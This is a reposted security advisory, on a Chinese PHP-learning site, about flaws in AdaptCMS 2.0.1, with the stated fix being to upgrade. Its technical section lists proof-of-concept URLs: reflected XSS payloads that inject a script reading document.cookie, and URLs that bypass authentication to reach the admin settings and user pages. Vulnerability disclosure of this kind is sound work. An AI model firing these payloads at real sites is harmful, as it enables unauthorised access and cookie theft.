来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: AdaptCMS 2.0.1 Multiple security vulnerabilities作者: Stefan Schurtz影响版本: AdaptCMS 2.0.1测试成功开发网站: http://www.adaptcms.com/ www.2cto.com状态:已修复缺陷描述:AdaptCMS 2......
|
标题: AdaptCMS 2.0.1 Multiple security vulnerabilities 作者: Stefan Schurtz 影响版本: AdaptCMS 2.0.1测试成功 开发网站: http://www.adaptcms.com/ www.2cto.com
状态:已修复
缺陷描述:
AdaptCMS 2.0.1存在多个缺陷
================== 技术分析 ==================
Cross-site Scripting
http://www.2cto.com /AdaptCMS/admin.php?view=</script><script>alert(document. cookie)</script> http://www.2cto.com /AdaptCMS/admin.php?view=share&do=</script><script>alert( document.cookie)</script> http://www.2cto.com /AdaptCMS//?'</script><script>alert(document.cookie)</scr ipt> http://www.2cto.com /AdaptCMS//index.php?'</script><script>alert(document.coo kie)</script>
Authentication bypass / Information Disclosure
http://www.2cto.com /AdaptCMS/admin.php?view=/&view=settings http://www.2cto.com /AdaptCMS/admin.php?view=/&view=users http://www.2cto.com /AdaptCMS/admin.php?view=/&view=groups http://www.2cto.com /AdaptCMS/admin.php?view=/&view=levels http://www.2cto.com /AdaptCMS/admin.php?view=/&view=stats
========= 解决方案 =========
升级 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
